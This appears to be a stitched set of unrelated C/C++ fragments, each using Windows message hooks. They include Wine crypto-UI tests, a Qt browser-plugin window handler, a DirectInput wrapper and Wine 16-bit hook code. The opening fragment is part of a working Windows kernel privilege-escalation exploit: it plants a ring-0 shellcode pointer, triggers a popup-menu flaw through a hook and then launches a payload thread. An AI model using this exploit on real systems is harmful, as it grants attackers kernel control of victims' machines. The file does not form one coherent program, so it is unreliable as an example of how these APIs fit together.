    *((PQWORD)test) = &shellcode_ring0;
#else
    void *test = promise_land + 3;
    /*
    We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
    .text:BF8B93F4 02C mov edi, _gptiCurrent
    .text:BF8B93FA 02C cmp edi, [esi + 8];
    .text:BF8B93FD 02C jz loc_BF8B
    */
    *(LPDWORD)test = pti;
    *((LPBYTE)(promise_land + 0x11)) = 0x4;
    test = promise_land + 0x5b;
    *(LPDWORD)test = (DWORD)shellcode_ring0;
#endif

    // Exploit!
    LogMessage("[*] Triggering vulnerability...");
    HMENU MenuOne = CreatePopupMenu();
    if (MenuOne == NULL) {
        LogMessage("[!] First CreatePopupMenu failed");
        return;
    }

    MENUITEMINFOA MenuOneInfo;
    memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
    MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
    MenuOneInfo.fMask = MIIM_STRING;
    if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
        LogMessage("[!] First InsertMenuItemA failed");
        DestroyMenu(MenuOne);
        return;
    }

    HMENU MenuTwo = CreatePopupMenu();
    if (MenuTwo == NULL) {
        LogMessage("[!] Second CreatePopupMenu failed");
        DestroyMenu(MenuOne);
        return;
    }

    MENUITEMINFOA MenuTwoInfo;
    memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
    MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
    MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
    MenuTwoInfo.dwTypeData = "";
    MenuTwoInfo.cch = 1;
    MenuTwoInfo.hSubMenu = MenuOne;
    if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
        LogMessage("[!] Second InsertMenuItemA failed");
        DestroyMenu(MenuTwo);
        DestroyMenu(MenuOne);
        return;
    }

    /* Thread-local hook (NULL module, current thread id); it is never
     * removed by this function. */
    if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
        LogMessage("[!] SetWindowsHookExA failed :-(\n");
        DestroyMenu(MenuTwo);
        DestroyMenu(MenuOne);
        return;
    }

    // 'crash' it!
    TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);

    // If everything worked process should be privileges at this point
    /* No success check is made before the payload thread is started. */
    LogMessage("[!] Executing payload...");
    CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
    return;
}
/* Exercises CryptUIWizImport in CRYPTUI_WIZ_NO_UI mode: invalid-argument
 * handling, mismatches between the ALLOW flags and the subject type, imports
 * of single certificates into the current user's system stores, and imports
 * of whole stores into a memory store.
 *
 * The statements depend on each other through `info`, `store` and the
 * thread's last-error value, so their order matters.
 *
 * NOTE(review): the successful single-certificate imports write into the
 * current user's real "CA" and "AddressBook" stores. Clean-up relies on
 * find_and_delete_cert_in_store (defined elsewhere); if CertOpenStore fails
 * or the delete does not find the certificate, the test certificate
 * presumably stays in that store - confirm the helper's behaviour.
 */
static void test_crypt_ui_wiz_import(void)
{
    BOOL ret;
    CRYPTUI_WIZ_IMPORT_SRC_INFO info;
    HCERTSTORE store;
    PCCERT_CONTEXT cert;
    PCCRL_CONTEXT crl;
    DWORD count;

    if (!pCryptUIWizImport)
    {
        skip("No CryptUIWizImport\n");
        return;
    }

    /* Set CBT hook to disallow MessageBox and wizard creation in current
     * thread.
     */
    /* The hook handle is not checked; it is released at the end of the test. */
    hook = SetWindowsHookExA(WH_CBT, cbt_hook_proc, 0, GetCurrentThreadId());

    /* Brings up UI.  Cancelling yields ret = 1. */
    if (0)
    {
        pCryptUIWizImport(0, 0, NULL, NULL, NULL);
    }
    /* Each call below is expected to be rejected with E_INVALIDARG until
     * info carries a size, a subject choice and a matching subject. */
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, NULL, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    memset(&info, 0, sizeof(info));
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    info.dwSize = sizeof(info);
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT;
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
     0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    /* Check allowed vs. given type mismatches */
    info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
     v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey));
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
     0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    CertFreeCertificateContext(info.u.pCertContext);
    info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CRL_CONTEXT;
    info.u.pCRLContext = CertCreateCRLContext(X509_ASN_ENCODING,
     signedCRL, sizeof(signedCRL));
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
     0, NULL, &info, NULL);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    CertFreeCRLContext(info.u.pCRLContext);
    /* Imports the following cert--self-signed, with no basic constraints set--
     * to the CA store.  Puts up a dialog at the end if it succeeds or fails.
     */
    info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT;
    info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
     v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey));
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        static const WCHAR CA[] = { 'C','A',0 };
        /* Opens the current user's CA store to verify and remove the cert. */
        HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
         CERT_SYSTEM_STORE_CURRENT_USER, CA);

        if (ca)
        {
            ret = find_and_delete_cert_in_store(ca, info.u.pCertContext);
            ok(ret ||
             broken(!ret) /* Win9x/NT4 */,
             "expected to find v1CertWithValidPubKey in CA store\n");
            CertCloseStore(ca, 0);
        }
    }
    CertFreeCertificateContext(info.u.pCertContext);
    /* Imports the following cert--not self-signed, with a basic constraints2
     * extensions--to the "AddressBook" store.  Puts up a dialog at the end if
     * it succeeds or fails.
     */
    info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
     iTunesCert3, sizeof(iTunesCert3));
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s',
         'B','o','o','k',0 };
        HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
         CERT_SYSTEM_STORE_CURRENT_USER, AddressBook);

        if (addressBook)
        {
            ret = find_and_delete_cert_in_store(addressBook,
             info.u.pCertContext);
            ok(ret ||
             broken(!ret), /* Windows 2000 and earlier */
             "expected to find iTunesCert3 in AddressBook store\n");
            CertCloseStore(addressBook, 0);
        }
    }
    /* The iTunesCert3 context stays alive here: it is reused for the
     * memory-store import below and freed after that. */
    /* Displays the wizard, but disables the "Certificate store" edit and
     * the Browse button.  Confusingly, the "Place all certificates in the
     * following store" radio button is not disabled.
     */
    if (0)
    {
        ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0,
         NULL, &info, NULL);
        ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    }
    store = CertOpenStore(CERT_STORE_PROV_MEMORY, X509_ASN_ENCODING, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    /* Displays the wizard, but sets the "Certificate store" edit to the
     * string "Determined by the program", and disables it and the Browse
     * button, as well as the "Automatically select the certificate store
     * based on the type of certificate" radio button.
     */
    if (0)
    {
        ret = pCryptUIWizImport(CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0,
         NULL, &info, store);
        ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    }
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI |
     CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE, 0, NULL, &info, store);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    ret = find_and_delete_cert_in_store(store, info.u.pCertContext);
    ok(ret ||
     broken(!ret) /* Win9x/NT4 */,
     "expected to find iTunesCert3 in memory store\n");
    CertFreeCertificateContext(info.u.pCertContext);
    CertCloseStore(store, 0);

    info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
     iTunesCert1, sizeof(iTunesCert1));
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        static const WCHAR AddressBook[] = { 'A','d','d','r','e','s','s',
         'B','o','o','k',0 };
        HCERTSTORE addressBook = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
         CERT_SYSTEM_STORE_CURRENT_USER, AddressBook);

        if (addressBook)
        {
            ret = find_and_delete_cert_in_store(addressBook,
             info.u.pCertContext);
            ok(ret ||
             broken(!ret), /* Windows 2000 and earlier */
             "expected to find iTunesCert1 in AddressBook store\n");
            CertCloseStore(addressBook, 0);
        }
    }
    CertFreeCertificateContext(info.u.pCertContext);

    info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
     iTunesCert2, sizeof(iTunesCert2));
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        static const WCHAR CA[] = { 'C','A',0 };
        HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0,
         CERT_SYSTEM_STORE_CURRENT_USER, CA);

        if (ca)
        {
            ret = find_and_delete_cert_in_store(ca, info.u.pCertContext);
            ok(ret ||
             broken(!ret) /* Win9x/NT4 */,
             "expected to find iTunesCert2 in CA store\n");
            CertCloseStore(ca, 0);
        }
    }
    CertFreeCertificateContext(info.u.pCertContext);

    /* From here on the import source is a memory store, not a single
     * context; this first one holds one certificate and one CRL. */
    info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING,
     v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey),
     CERT_STORE_ADD_ALWAYS, NULL);
    CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL,
     sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL);
    info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_STORE;
    /* The ALLOW flags aren't allowed with a store as the source if the source
     * contains types other than those allowed.
     */
    store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
     0, NULL, &info, store);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
     0, NULL, &info, store);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI |
     CRYPTUI_WIZ_IMPORT_NO_CHANGE_DEST_STORE |
     CRYPTUI_WIZ_IMPORT_ALLOW_CERT | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL,
     &info, store);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        /* Count what actually landed in the destination store. */
        count = 0;
        cert = NULL;
        do {
            cert = CertEnumCertificatesInStore(store, cert);
            if (cert)
                count++;
        } while (cert);
        ok(count == 1, "expected 1 cert, got %d\n", count);
        count = 0;
        crl = NULL;
        do {
            crl = CertEnumCRLsInStore(store, crl);
            if (crl)
                count++;
        } while (crl);
        ok(count == 1, "expected 1 CRL, got %d\n", count);
    }
    CertCloseStore(store, 0);
    CertCloseStore(info.u.hCertStore, 0);

    /* If the ALLOW flags match the content of the store, the store can be
     * imported.
     */
    info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    CertAddEncodedCertificateToStore(info.u.hCertStore, X509_ASN_ENCODING,
     v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey),
     CERT_STORE_ADD_ALWAYS, NULL);
    store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
     0, NULL, &info, store);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        count = 0;
        cert = NULL;
        do {
            cert = CertEnumCertificatesInStore(store, cert);
            if (cert)
                count++;
        } while (cert);
        ok(count == 1, "expected 1 cert, got %d\n", count);
        count = 0;
        crl = NULL;
        do {
            crl = CertEnumCRLsInStore(store, crl);
            if (crl)
                count++;
        } while (crl);
        ok(count == 0, "expected 0 CRLs, got %d\n", count);
    }
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
     0, NULL, &info, store);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    CertCloseStore(store, 0);
    CertCloseStore(info.u.hCertStore, 0);

    /* Again, if the ALLOW flags match the content of the store, the store can
     * be imported.
     */
    info.u.hCertStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    CertAddEncodedCRLToStore(info.u.hCertStore, X509_ASN_ENCODING, signedCRL,
     sizeof(signedCRL), CERT_STORE_ADD_ALWAYS, NULL);
    store = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
     CERT_STORE_CREATE_NEW_FLAG, NULL);
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
     0, NULL, &info, store);
    ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError());
    if (ret)
    {
        count = 0;
        cert = NULL;
        do {
            cert = CertEnumCertificatesInStore(store, cert);
            if (cert)
                count++;
        } while (cert);
        ok(count == 0, "expected 0 certs, got %d\n", count);
        count = 0;
        crl = NULL;
        do {
            crl = CertEnumCRLsInStore(store, crl);
            if (crl)
                count++;
        } while (crl);
        ok(count == 1, "expected 1 CRL, got %d\n", count);
    }
    SetLastError(0xdeadbeef);
    ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
     0, NULL, &info, store);
    ok(!ret && GetLastError() == E_INVALIDARG,
     "expected E_INVALIDARG, got %08x\n", GetLastError());
    CertCloseStore(store, 0);
    CertCloseStore(info.u.hCertStore, 0);

    /* Remove the CBT hook installed at the top of the test. */
    UnhookWindowsHookEx(hook);
}
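/// NPAPI entry point: the browser calls this when the plugin's window is
/// created, moved, resized or destroyed.
///
/// @param instance  Plugin instance handed out by the browser; its pdata is
///                  read as the _NPInstance for this plugin.
/// @param window    New window description, or NULL when the window goes away.
/// @return NPERR_INVALID_INSTANCE_ERROR when instance (or its pdata) is NULL,
///         NPERR_NO_ERROR otherwise.
///
/// Both arguments arrive from the hosting browser process, so they are checked
/// before being dereferenced.
extern "C" NPError NPP_SetWindow(NPP instance, NPWindow* window)
{
    if (!qNP)
        qNP = QNPlugin::create();
    NPError result = NPERR_NO_ERROR;
    _NPInstance* This;
    if (instance == NULL)
        return NPERR_INVALID_INSTANCE_ERROR;

    This = (_NPInstance*) instance->pdata;
    // pdata is dereferenced unconditionally below; reject an instance that
    // carries no private data instead of crashing inside the host process.
    if (This == NULL)
        return NPERR_INVALID_INSTANCE_ERROR;

    // take a shortcut if all that was changed is the geometry
    if ( This->widget && window
#ifdef Q_WS_X11
         && This->window == (Window) window->window
#endif
#ifdef Q_WS_WIN
         && This->window == (HWND) window->window
#endif
       ) {
        This->x = window->x;
        This->y = window->y;
        This->width = window->width;
        This->height = window->height;
        This->widget->resize( This->width, This->height );
        return result;
    }

    delete This->widget;
    // NOTE(review): the QNPWidget destructor presumably resets This->widget;
    // it is cleared here as well so that neither the early return below nor
    // the `!This->widget` check after newWindow() can see a stale pointer.
    This->widget = 0;

    if ( !window )
        return result;

#ifdef Q_WS_X11
    This->window = (Window) window->window;
    // NOTE(review): ws_info is trusted to be a valid NPSetWindowCallbackStruct
    // here; confirm the host always supplies it on X11.
    This->display = ((NPSetWindowCallbackStruct *)window->ws_info)->display;
#endif
#ifdef Q_WS_WIN
    This->window = (HWND) window->window;
#endif

    This->x = window->x;
    This->y = window->y;
    This->width = window->width;
    This->height = window->height;

    if (!qApp) {
#ifdef Q_WS_X11
        // We are the first Qt-based plugin to arrive
        event_loop = new QNPXt( "qnp", XtDisplayToApplicationContext(This->display) );
        application = new QApplication(This->display);
#endif
#ifdef Q_WS_WIN
        static int argc=0;
        static char **argv={ 0 };
        application = new QApplication( argc, argv );
        // The message hook is installed with a NULL module handle and the
        // current thread id, so it only observes this thread's message queue.
        // NOTE(review): the returned handle is not checked for failure.
#ifdef UNICODE
        if ( qWinVersion() & Qt::WV_NT_based )
            hhook = SetWindowsHookExW( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() );
        else
#endif
            hhook = SetWindowsHookExA( WH_GETMESSAGE, FilterProc, 0, GetCurrentThreadId() );
#endif
    }

#ifdef Q_WS_X11
    if ( !original_x_errhandler )
        original_x_errhandler = XSetErrorHandler( dummy_x_errhandler );
#endif

    // New widget on this new window.
    next_pi = This;
    /* This->widget = */ // (happens sooner - in QNPWidget constructor)
    This->instance->newWindow();

    if ( !This->widget )
        return result;

#ifdef Q_WS_X11
    This->widget->resize( This->width, This->height );
    XReparentWindow( This->widget->x11Display(), This->widget->winId(), This->window, 0, 0 );
    XSync( This->widget->x11Display(), False );
#endif
#ifdef Q_WS_WIN
    // Make the Qt widget a clipped child of the browser-provided window.
    LONG oldLong = GetWindowLong(This->window, GWL_STYLE);
    ::SetWindowLong(This->window, GWL_STYLE, oldLong | WS_CLIPCHILDREN | WS_CLIPSIBLINGS);
    ::SetWindowLong( This->widget->winId(), GWL_STYLE, WS_CHILD | WS_CLIPCHILDREN | WS_CLIPSIBLINGS );
    ::SetParent( This->widget->winId(), This->window );
    This->widget->raise();
    This->widget->setGeometry( 0, 0, This->width, This->height );
#endif
    This->widget->show();
    return result;
}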
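{ if (dwReason == DLL_PROCESS_ATTACH) QMfcApp::pluginInstance(hInstance); return TRUE; } \endcode */
bool pluginInstance(Qt::HANDLE plugin)
{
    // A QApplication already exists, so there is nothing to set up here.
    if (qApp)
        return FALSE;

    // Thread-scoped WH_GETMESSAGE hook: no module handle is passed and the
    // thread id is the caller's, so only this thread's queue is filtered.
    // NOTE(review): the hook handle is not checked for failure.
    QT_WA({
        hhook = SetWindowsHookExW(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId());
    }, {
        hhook = SetWindowsHookExA(WH_GETMESSAGE, QtFilterProc, 0, GetCurrentThreadId());
    });

    int argc = 0;
    (void)new QApplication(argc, 0);

    if (plugin) {
        // Load the plugin module a second time by its own full path
        // (presumably to keep it resident once Qt lives inside it - confirm).
        // GetModuleFileNameA returns the buffer size when the path did not
        // fit; a truncated path may name a different file and, on older
        // Windows versions, is not NUL-terminated, so it is never passed on.
        char filename[MAX_PATH];
        const DWORD length = GetModuleFileNameA((HINSTANCE)plugin, filename, sizeof(filename));
        if (length > 0 && length < sizeof(filename))
            LoadLibraryA(filename);
    }

    return TRUE;
}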
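/// Resets the wrapper's input state and loads the real DirectInput DLL from
/// the system directory.
///
/// @param mod_hnd  Module handle of this wrapper; stored in wrapperModule on
///                 success and later passed to SetWindowsHookExA by InitHID.
/// @return true when the system DLL was loaded and its factory export was
///         resolved, false otherwise.
bool WrapperSystem::Init( HANDLE mod_hnd )
{
#ifdef DI_WRAPPER8
    static const char dinputDllFile[ ] = "\\dinput8.dll";
#else
    static const char dinputDllFile[ ] = "\\dinput.dll";
#endif
    char dinputDllName[ MAX_PATH ];

    // returns with system32 even on win64 32bit mode, but image loader solves it
    const UINT sysDirLen = GetSystemDirectoryA( dinputDllName, MAX_PATH );

    button6ShutdownEvent.Clear( );
    button6ShutdownEvent.SetType( type_button_6 );
    button6ShutdownEvent.usButtonFlags = 0x800;
    button6ShutdownEvent.usButtonData = 0;

    button7ShutdownEvent.Clear( );
    button7ShutdownEvent.SetType( type_button_7 );
    button7ShutdownEvent.usButtonFlags = 0x800;
    button7ShutdownEvent.usButtonData = 0;

    memset( immediateBuffer, 0, sizeof( LONG ) * type_list_size );
    bufferedMode = false;

    // The DLL must be loaded by its absolute system path. If the directory
    // lookup failed (0) or the joined path would not fit (the return value is
    // the required size when the buffer is too small), the buffer content is
    // unusable: appending to it would overflow or produce a relative name.
    // sizeof( dinputDllFile ) already counts the terminating NUL.
    if( sysDirLen == 0 || sysDirLen + sizeof( dinputDllFile ) > sizeof( dinputDllName ) )
        return false;

    strcat( dinputDllName, dinputDllFile );

    // Win32 LoadLibrary reports failure with NULL (the "greater than 31"
    // rule the code used before is the 16-bit convention).
    dinputDll = LoadLibraryA( dinputDllName );
    if( !dinputDll )
        return false;

#ifdef DI_WRAPPER8
    DirectInput8Create = ( DIRECTINPUT8CREATEPROC )GetProcAddress( dinputDll, "DirectInput8Create" );
    const bool haveFactory = ( DirectInput8Create != 0 );
#else
    DirectInputCreateA = ( DIRECTINPUTCREATEAPROC )GetProcAddress( dinputDll, "DirectInputCreateA" );
    const bool haveFactory = ( DirectInputCreateA != 0 );
#endif

    if( !haveFactory )
    {
        // Releases the library again; see Shutdown.
        Shutdown( );
        return false;
    }

    wrapperModule = mod_hnd;
    return true;
}

/// Deletes all wrapper objects, removes both window hooks and releases the
/// real DirectInput DLL. Safe to call more than once (Init calls it on its
/// failure path, so a later call on unload must not free anything twice).
void WrapperSystem::Shutdown( )
{
    for( WrapperList::iterator wrpItr = wrappers.begin( ); wrpItr != wrappers.end( ); ++wrpItr )
    {
        delete *wrpItr;
    }
    // Drop the now-dangling pointers so a repeated Shutdown cannot delete
    // them again. NOTE(review): assumes WrapperList is a standard container
    // and that wrapper destructors do not edit this list themselves.
    wrappers.clear( );

    bufferedMode = false;

    if( hookHandleGetMessage )
    {
        UnhookWindowsHookEx( hookHandleGetMessage );
        hookHandleGetMessage = 0;
    }

    if( hookHandleCallWnd )
    {
        UnhookWindowsHookEx( hookHandleCallWnd );
        hookHandleCallWnd = 0;
    }

    // Free the library once and forget the handle; a stale handle passed to
    // FreeLibrary again could unload a module that still has users.
    if( dinputDll )
    {
        FreeLibrary( dinputDll );
        dinputDll = 0;
    }

    // NOTE(review): hidInitialized is left untouched, so InitHID will not
    // re-install the hooks after a Shutdown - confirm this is intended.
}

/// Registers for raw mouse input and installs the two message hooks on the
/// calling thread. Does nothing when already initialised.
///
/// @param h_wnd  Target window; when null it is replaced (in the caller's
///               variable too) by the current foreground window.
void WrapperSystem::InitHID( HWND & h_wnd )
{
    if( hidInitialized ) return;

    // jk2 sends a null hwnd, and RegisterRawInputDevices fails without it, so grab one with GetForegroundWindow
    if( !h_wnd )
    {
        h_wnd = GetForegroundWindow( );
    }

    RAWINPUTDEVICE Rid;
    Rid.usUsagePage = HID_USAGE_PAGE_GENERIC;
    Rid.usUsage = HID_USAGE_GENERIC_MOUSE;
    Rid.dwFlags = RIDEV_INPUTSINK;
    Rid.hwndTarget = h_wnd;

    if( !RegisterRawInputDevices( &Rid, 1, sizeof( RAWINPUTDEVICE ) ) ) return;

    // register our hook into the game main message loop
    // Both hooks are bound to the current thread id, i.e. they are
    // thread-scoped and not installed system-wide.
    hookHandleGetMessage = SetWindowsHookExA( WH_GETMESSAGE, WindowHookFuncGetMessage, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) );
    if( !hookHandleGetMessage ) return;

    hookHandleCallWnd = SetWindowsHookExA( WH_CALLWNDPROC, WindowHookFuncCallWnd, ( HINSTANCE )wrapperModule, GetCurrentThreadId( ) );
    if( !hookHandleCallWnd )
    {
        // Do not leave a half-installed pair behind: hidInitialized stays
        // false, so a retry would otherwise overwrite (and leak) this handle
        // and the hook procedure would run twice per message.
        UnhookWindowsHookEx( hookHandleGetMessage );
        hookHandleGetMessage = 0;
        return;
    }

    hidInitialized = true;
}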
/***********************************************************************
 *		SetWindowsHookEx (USER.291)
 *
 * 16-bit entry point: installs a 32-bit hook (the matching hook_procs[]
 * thunk) on the current thread and records the 16-bit callback per hook
 * type in the thread's hook16_queue_info.
 *
 * Returns the hook handle, or 0 when the hook id is out of range or has no
 * thunk, the hook targets another task, a hook of that type already exists
 * for this task, or allocation / SetWindowsHookExA fails.
 */
HHOOK WINAPI SetWindowsHookEx16( INT16 id, HOOKPROC16 proc, HINSTANCE16 hInst, HTASK16 hTask )
{
    struct user_thread_info *tinfo = get_user_thread_info();
    struct hook16_queue_info *queue;
    HHOOK handle;
    int slot;

    /* validate the id before it is used to index hook_procs[] and the
     * per-thread hook[]/proc[] arrays */
    if (id < WH_MINHOOK || id > WH_MAXHOOK16) return 0;
    slot = id - WH_MINHOOK;

    if (!hook_procs[slot])
    {
        FIXME( "hook type %d broken in Win16\n", id );
        return 0;
    }

    if (hTask)
    {
        /* only the calling task may be hooked */
        if (hTask != GetCurrentTask())
        {
            FIXME( "setting hook (%d) on other task not supported\n", id );
            return 0;
        }
    }
    else FIXME( "System-global hooks (%d) broken in Win16\n", id );

    /* the per-thread bookkeeping is allocated on first use */
    queue = tinfo->hook16_info;
    if (!queue)
    {
        queue = HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(*queue) );
        if (!queue) return 0;
        tinfo->hook16_info = queue;
    }

    if (queue->hook[slot])
    {
        FIXME( "Multiple hooks (%d) for the same task not supported yet\n", id );
        return 0;
    }

    /* always thread-local: no module handle, current thread id */
    handle = SetWindowsHookExA( id, hook_procs[slot], 0, GetCurrentThreadId() );
    if (!handle) return 0;

    queue->hook[slot] = handle;
    queue->proc[slot] = proc;
    return handle;
}
/***********************************************************************
 *		SetWindowsHookA (USER32.@)
 *
 * Legacy form of SetWindowsHookExA: installs proc as a hook of type id
 * with no module handle and the calling thread's id, so the hook is
 * limited to the current thread. Returns whatever SetWindowsHookExA
 * returns.
 */
HHOOK WINAPI SetWindowsHookA( INT id, HOOKPROC proc )
{
    HHOOK hook;

    hook = SetWindowsHookExA( id, proc, 0, GetCurrentThreadId() );
    return hook;
}